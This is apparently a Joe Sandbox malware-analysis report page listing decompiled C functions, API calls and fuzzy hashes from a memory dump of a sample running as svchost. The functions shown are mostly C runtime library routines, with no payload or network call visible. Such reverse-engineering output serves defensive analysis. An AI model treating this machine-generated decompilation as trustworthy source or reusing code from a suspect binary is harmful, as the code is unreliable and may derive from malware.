                            • __freea.LIBCMT ref: 00BD9138
                              • Part of subcall function 00BD0A25: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BD80E5,00000000,?,00BD0C3C,?,00000008,?,00BD3E2E,?,?,?), ref: 00BD0A57
                            • __freea.LIBCMT ref: 00BD9141
                            • __freea.LIBCMT ref: 00BD9166
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                            • String ID:
                            • API String ID: 1414292761-0
                            • Opcode ID: 33ad6a1bccaa601dfda609717065e297ec19e28715e493534616a47f48da35b1
                            • Instruction ID: fe01e04aa36b9b583feaae3bbf15e63aecb7124982d68ad95cb8512aca6f579f
                            • Opcode Fuzzy Hash: 33ad6a1bccaa601dfda609717065e297ec19e28715e493534616a47f48da35b1
                            • Instruction Fuzzy Hash: BD51CD72610217ABDB259F64DC85EABBBEAEB44750F1546AAF908E7340FB34DC40C690
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BD4425, Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 71%
                            			E00BD4425(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0xbec238; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00BD0B10(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E00BD3862(_t25, __eflags,  *0xbec238, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00BD4297(_t25, _t31, 0xbf63f0);
							E00BD09EB(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00BD09EB();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00BD0ACD(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0xbec238; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00BD0B10(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E00BD3862(_t27, __eflags,  *0xbec238, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00BD4297(_t27, _t32, 0xbf63f0);
									E00BD09EB(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00BD09EB();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00BD380C(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00BD380C(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                            0x00bd4425
                            0x00bd4425
                            0x00bd4425
                            0x00bd442f
                            0x00bd4431
                            0x00bd4436
                            0x00bd4439
                            0x00bd4447
                            0x00bd444e
                            0x00bd4453
                            0x00bd4456
                            0x00bd4459
                            0x00bd446b
                            0x00bd4470
                            0x00bd4472
                            0x00bd447d
                            0x00bd4484
                            0x00bd4489
                            0x00bd448c
                            0x00bd448e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd4474
                            0x00bd4474
                            0x00000000
                            0x00bd4474
                            0x00bd445b
                            0x00bd445b
                            0x00bd445c
                            0x00bd445c
                            0x00bd4461
                            0x00bd449c
                            0x00bd449d
                            0x00bd44a3
                            0x00bd44a8
                            0x00bd44ab
                            0x00bd44ac
                            0x00bd44ad
                            0x00bd44b4
                            0x00bd44b6
                            0x00bd44b8
                            0x00bd44bd
                            0x00bd44c0
                            0x00bd44ce
                            0x00bd44da
                            0x00bd44dd
                            0x00bd44e0
                            0x00bd44f2
                            0x00bd44f7
                            0x00bd44f9
                            0x00bd4504
                            0x00bd450a
                            0x00bd4512
                            0x00bd4514
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd44fb
                            0x00bd44fb
                            0x00000000
                            0x00bd44fb
                            0x00bd44e2
                            0x00bd44e2
                            0x00bd44e3
                            0x00bd44e3
                            0x00bd4516
                            0x00bd4517
                            0x00bd4517
                            0x00bd44c2
                            0x00bd44c8
                            0x00bd44cc
                            0x00bd451f
                            0x00bd4520
                            0x00bd4526
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd44cc
                            0x00bd452d
                            0x00bd452d
                            0x00bd443b
                            0x00bd4441
                            0x00bd4445
                            0x00bd4490
                            0x00bd4491
                            0x00bd449b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd4445

                            APIs
                            • GetLastError.KERNEL32(?,00000000,00BCAFEC,00000000,?,?,00BCA8EB,?,?,00000000), ref: 00BD4429
                            • _free.LIBCMT ref: 00BD445C
                            • _free.LIBCMT ref: 00BD4484
                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 00BD4491
                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 00BD449D
                            • _abort.LIBCMT ref: 00BD44A3
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorLast$_free$_abort
                            • String ID:
                            • API String ID: 3160817290-0
                            • Opcode ID: 12c55e01bb781a9f24ccbd1a4519845f7f918ff70cab3630febc994e88403ead
                            • Instruction ID: 36e19737e0e6cf9c598cf39b7217a6621bb24c38b263cc6a92e4612c95f34a03
                            • Opcode Fuzzy Hash: 12c55e01bb781a9f24ccbd1a4519845f7f918ff70cab3630febc994e88403ead
                            • Instruction Fuzzy Hash: 18F0283511070127C61233B96C8AB2FABE6DFC1B61F204197F5189B3A3FF708C825A12
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BCD000, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 51COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00BCD000(void* __ebx, void* __edi, intOrPtr _a4) {
				void* __esi;
				void* _t4;

				_t21 = __edi;
				_t10 = __ebx;
				if(_a4 != 0) {
					_t23 = E00BDF355(_a4, 0x2e);
					if(_t3 == 0 || E00BD51D5(__ebx, __edi, _t23, _t23, L".exe") != 0 && E00BD51D5(__ebx, __edi, _t23, _t23, L".cmd") != 0 && E00BD51D5(_t10, _t21, _t23, _t23, L".bat") != 0 && E00BD51D5(_t10, _t21, _t23, _t23, L".com") != 0) {
						_t4 = 0;
					} else {
						_t4 = 1;
					}
					return _t4;
				} else {
					return 0;
				}
			}





                            0x00bcd000
                            0x00bcd000
                            0x00bcd009
                            0x00bcd01a
                            0x00bcd020
                            0x00bcd066
                            0x00bcd06a
                            0x00bcd06a
                            0x00bcd06a
                            0x00bcd06e
                            0x00bcd00b
                            0x00bcd00e
                            0x00bcd00e

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: _wcsrchr
                            • String ID: .bat$.cmd$.com$.exe
                            • API String ID: 1752292252-4019086052
                            • Opcode ID: f54917e5badc8e402c7e79762da38ba16862e7cfa36e0556388975977180229c
                            • Instruction ID: 9cd92a5aa493d0de7405f9e2074837d15706ebb3fa4394a9fb466669ed0326e8
                            • Opcode Fuzzy Hash: f54917e5badc8e402c7e79762da38ba16862e7cfa36e0556388975977180229c
                            • Instruction Fuzzy Hash: 02F0963A189F1635993425196823F9A57C8CF42775F2500EFFD08765C1EF91D54350A9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BD01DD, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 37%
                            			E00BD01DD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t19;
				signed int _t21;

				_t10 =  *0xbec008; // 0xdc55bb75
				_v8 = _t10 ^ _t21;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t19 = _t12;
					if(_t19 != 0) {
						 *0xbe019c(_a4);
						_t12 =  *_t19();
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E00BC786A();
				return _t12;
			}









                            0x00bd01e4
                            0x00bd01eb
                            0x00bd01ee
                            0x00bd01f2
                            0x00bd01fd
                            0x00bd0205
                            0x00bd0210
                            0x00bd0216
                            0x00bd021a
                            0x00bd0221
                            0x00bd0227
                            0x00bd0227
                            0x00bd0229
                            0x00bd022e
                            0x00bd0233
                            0x00bd0233
                            0x00bd023e
                            0x00bd0246

                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00BD018E,?,?,00BD012E,?,00BEA6E0,0000000C,00BD0285,?,00000002), ref: 00BD01FD
                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BD0210
                            • FreeLibrary.KERNEL32(00000000,?,?,?,00BD018E,?,?,00BD012E,?,00BEA6E0,0000000C,00BD0285,?,00000002,00000000), ref: 00BD0233
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: 8c1ebf163b7cd53b6f8a80273712b32eca2a552e84878e3a897d2645b1608360
                            • Instruction ID: 820a52f5636244044fcadf69ce1a017f2512281517ba19693c9d4aadca00781f
                            • Opcode Fuzzy Hash: 8c1ebf163b7cd53b6f8a80273712b32eca2a552e84878e3a897d2645b1608360
                            • Instruction Fuzzy Hash: D4F04430A61258BBCB11AF91DC49B9DBFF4EF08711F400199F905AA260DFB05A80CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BD05E4, Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 83%
                            			E00BD05E4(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0xbec008; // 0xdc55bb75
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E00BCF6AC( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E00BC9353(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E00BC9353(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E00BC9353(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E00BD850F(_t56);
						_t40 = E00BD09EB(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E00BD850F(_t56);
						E00BD09EB(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0xbec008;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

























                            0x00bd05e4
                            0x00bd05ee
                            0x00bd05f2
                            0x00bd05f4
                            0x00bd05f8
                            0x00bd0602
                            0x00bd0613
                            0x00bd0618
                            0x00bd061a
                            0x00bd061c
                            0x00bd061e
                            0x00bd0620
                            0x00bd0624
                            0x00bd06de
                            0x00bd06ec
                            0x00bd06ee
                            0x00bd06f3
                            0x00bd06fa
                            0x00bd06fc
                            0x00bd070a
                            0x00bd0719
                            0x00bd071c
                            0x00bd071e
                            0x00000000
                            0x00bd071f
                            0x00bd062c
                            0x00bd0631
                            0x00bd0636
                            0x00bd0638
                            0x00bd0638
                            0x00bd063a
                            0x00bd063f
                            0x00bd0643
                            0x00bd0643
                            0x00bd0646
                            0x00bd0665
                            0x00bd0665
                            0x00bd0667
                            0x00bd066a
                            0x00bd0673
                            0x00bd0676
                            0x00bd067b
                            0x00bd067e
                            0x00bd0683
                            0x00000000
                            0x00000000
                            0x00bd0685
                            0x00000000
                            0x00bd0648
                            0x00bd0648
                            0x00bd064a
                            0x00bd0653
                            0x00bd0656
                            0x00bd065b
                            0x00bd065e
                            0x00bd0663
                            0x00bd068d
                            0x00bd0690
                            0x00bd0692
                            0x00bd0695
                            0x00bd069d
                            0x00bd06a3
                            0x00bd06aa
                            0x00bd06ac
                            0x00bd06b4
                            0x00bd06c3
                            0x00bd06c7
                            0x00bd06c9
                            0x00bd06cc
                            0x00000000
                            0x00000000
                            0x00bd06ce
                            0x00bd06d1
                            0x00bd06d3
                            0x00bd06d3
                            0x00bd06d4
                            0x00bd06d6
                            0x00bd06d9
                            0x00000000
                            0x00bd06d3
                            0x00000000
                            0x00bd0663
                            0x00bd0646
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: af8858a155af908ec7cc4f7b0803f45f438e895668cc3e08dec60daedfb28abc
                            • Instruction ID: 3b37e7fa052cf101259359897e934c3a9a9904cfb7e7c397eaae53b152616a0e
                            • Opcode Fuzzy Hash: af8858a155af908ec7cc4f7b0803f45f438e895668cc3e08dec60daedfb28abc
                            • Instruction Fuzzy Hash: 9141B032A102049BDB14EF78C891B5EB7E5EF89714F1545AAE555EB382EB31ED01CB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BCE132, Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                            Download Yara Rule
                            C-Code - Quality: 87%
                            			E00BCE132(void* __ecx, short* _a4, short* _a8) {
				int _t7;
				char* _t13;
				signed int _t14;
				char* _t15;
				int _t19;
				intOrPtr* _t20;
				short* _t21;
				void* _t22;
				void* _t25;
				int _t29;
				int _t33;
				intOrPtr _t35;
				char* _t36;

				_t25 = __ecx;
				_t7 = WideCharToMultiByte(0, 0, _a4, 0xffffffff, 0, 0, 0, 0);
				_t21 = _a8;
				_t33 = _t7;
				_t35 = 0x2a;
				if(_t33 != 0) {
					if(_t21 != 0) {
						_t19 = WideCharToMultiByte(0, 0, _t21, 0xffffffff, 0, 0, 0, 0);
						if(_t19 == 0) {
							goto L1;
						} else {
							_t33 = _t33 + _t19;
						}
					}
				} else {
					L1:
					_t20 = E00BCC9CE();
					_t33 = 0;
					 *_t20 = _t35;
				}
				_t36 = E00BD0B10(_t25, _t33, 1);
				if(_t36 == 0) {
					L8:
					_t22 = 0;
				} else {
					_t29 = WideCharToMultiByte(0, 0, _a4, 0xffffffff, _t36, _t33, 0, 0);
					if(_t29 != 0) {
						if(_t21 == 0) {
							L12:
							_t13 = _t36;
							_t36 = 0;
							_push(0);
							_push(_t13);
							_t14 = E00BD6882(0);
							asm("sbb bl, bl");
							_t22 =  ~_t14 + 1;
						} else {
							_t15 = _t29 + _t36;
							 *((char*)(_t15 - 1)) = 0x3d;
							if(WideCharToMultiByte(0, 0, _t21, 0xffffffff, _t15, _t33 - _t29, 0, 0) == 0) {
								goto L7;
							} else {
								goto L12;
							}
						}
					} else {
						L7:
						 *((intOrPtr*)(E00BCC9CE())) = 0x2a;
						goto L8;
					}
				}
				E00BD09EB(_t36);
				return _t22;
			}
















                            0x00bce132
                            0x00bce147
                            0x00bce14d
                            0x00bce150
                            0x00bce154
                            0x00bce157
                            0x00bce166
                            0x00bce173
                            0x00bce17b
                            0x00000000
                            0x00bce17d
                            0x00bce17d
                            0x00bce17d
                            0x00bce17b
                            0x00bce159
                            0x00bce159
                            0x00bce159
                            0x00bce15e
                            0x00bce160
                            0x00bce160
                            0x00bce187
                            0x00bce18d
                            0x00bce1b3
                            0x00bce1b3
                            0x00bce18f
                            0x00bce1a2
                            0x00bce1a6
                            0x00bce1c5
                            0x00bce1e5
                            0x00bce1e5
                            0x00bce1e7
                            0x00bce1e9
                            0x00bce1ea
                            0x00bce1eb
                            0x00bce1f5
                            0x00bce1f8
                            0x00bce1c7
                            0x00bce1c9
                            0x00bce1d0
                            0x00bce1e3
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bce1e3
                            0x00bce1a8
                            0x00bce1a8
                            0x00bce1ad
                            0x00000000
                            0x00bce1ad
                            0x00bce1a6
                            0x00bce1b6
                            0x00bce1c2

                            APIs
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,00BCDFF2,?,?), ref: 00BCE147
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,00BCDFF2,?,?), ref: 00BCE173
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,00BCDFF2,?,?), ref: 00BCE19C
                            • _free.LIBCMT ref: 00BCE1B6
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,00BCDFF2,?,?), ref: 00BCE1DB
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$_free
                            • String ID:
                            • API String ID: 4292660327-0
                            • Opcode ID: cd4836710a6fa9af2b6bfcc1527f2141067a08122fa716f7cfe2117363284a1d
                            • Instruction ID: 4c49759da5f5da4aa381f08d5e78da5d8a2ef8ae0a1e12fe4bc235b9831285b4
                            • Opcode Fuzzy Hash: cd4836710a6fa9af2b6bfcc1527f2141067a08122fa716f7cfe2117363284a1d
                            • Instruction Fuzzy Hash: 7D21D5B2259315BEBB212A765C49F772ADDDB82B70724026EFD24D72C1ED70CC008170
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BD7C60, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                            Download Yara Rule
                            C-Code - Quality: 93%
                            			E00BD7C60() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E00BD7C29(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E00BD0A25(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E00BD09EB(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}












                            0x00bd7c6f
                            0x00bd7c75
                            0x00bd7ccd
                            0x00bd7ccd
                            0x00bd7c77
                            0x00bd7c78
                            0x00bd7c7d
                            0x00bd7c86
                            0x00bd7c8c
                            0x00bd7c92
                            0x00bd7c97
                            0x00000000
                            0x00bd7c99
                            0x00bd7c9f
                            0x00bd7ca4
                            0x00bd7cc2
                            0x00bd7cbc
                            0x00bd7cbc
                            0x00bd7cbe
                            0x00bd7cbe
                            0x00bd7cc5
                            0x00bd7cca
                            0x00bd7c97
                            0x00bd7cd1
                            0x00bd7cd4
                            0x00bd7cd4
                            0x00bd7ce2

                            APIs
                            • GetEnvironmentStringsW.KERNEL32 ref: 00BD7C69
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BD7C8C
                              • Part of subcall function 00BD0A25: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BD80E5,00000000,?,00BD0C3C,?,00000008,?,00BD3E2E,?,?,?), ref: 00BD0A57
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00BD7CB2
                            • _free.LIBCMT ref: 00BD7CC5
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BD7CD4
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                            • String ID:
                            • API String ID: 336800556-0
                            • Opcode ID: d15b50bf9e6aff7608f5ac6fc6fe2946a6e2107f6fa6109a45f95b2b50c9d02c
                            • Instruction ID: 957a8f03a116e7d4310296ce6dd8d59fc630263666897634b22d6b8fa9f5fef6
                            • Opcode Fuzzy Hash: d15b50bf9e6aff7608f5ac6fc6fe2946a6e2107f6fa6109a45f95b2b50c9d02c
                            • Instruction Fuzzy Hash: BD0184766653557F27216A7A6DCCDBBEBADDFC2BA031801AAB904D7301FE608C0181B0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BD44A9, Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 81%
                            			E00BD44A9(void* __ecx) {
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t15;
				long _t16;

				_t11 = __ecx;
				_t16 = GetLastError();
				_t10 = 0;
				_t2 =  *0xbec238; // 0x6
				_t19 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t15 = E00BD0B10(_t11, 1, 0x364);
					_pop(_t13);
					if(_t15 != 0) {
						_t4 = E00BD3862(_t13, __eflags,  *0xbec238, _t15);
						__eflags = _t4;
						if(_t4 != 0) {
							E00BD4297(_t13, _t15, 0xbf63f0);
							E00BD09EB(_t10);
							__eflags = _t15;
							if(_t15 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t15);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E00BD09EB();
						L8:
						SetLastError(_t16);
					}
				} else {
					_t15 = E00BD380C(_t11, _t19, _t2);
					if(_t15 != 0) {
						L9:
						SetLastError(_t16);
						_t10 = _t15;
					} else {
						goto L2;
					}
				}
				return _t10;
			}










                            0x00bd44a9
                            0x00bd44b4
                            0x00bd44b6
                            0x00bd44b8
                            0x00bd44bd
                            0x00bd44c0
                            0x00bd44ce
                            0x00bd44da
                            0x00bd44dd
                            0x00bd44e0
                            0x00bd44f2
                            0x00bd44f7
                            0x00bd44f9
                            0x00bd4504
                            0x00bd450a
                            0x00bd4512
                            0x00bd4514
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd44fb
                            0x00bd44fb
                            0x00000000
                            0x00bd44fb
                            0x00bd44e2
                            0x00bd44e2
                            0x00bd44e3
                            0x00bd44e3
                            0x00bd4516
                            0x00bd4517
                            0x00bd4517
                            0x00bd44c2
                            0x00bd44c8
                            0x00bd44cc
                            0x00bd451f
                            0x00bd4520
                            0x00bd4526
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd44cc
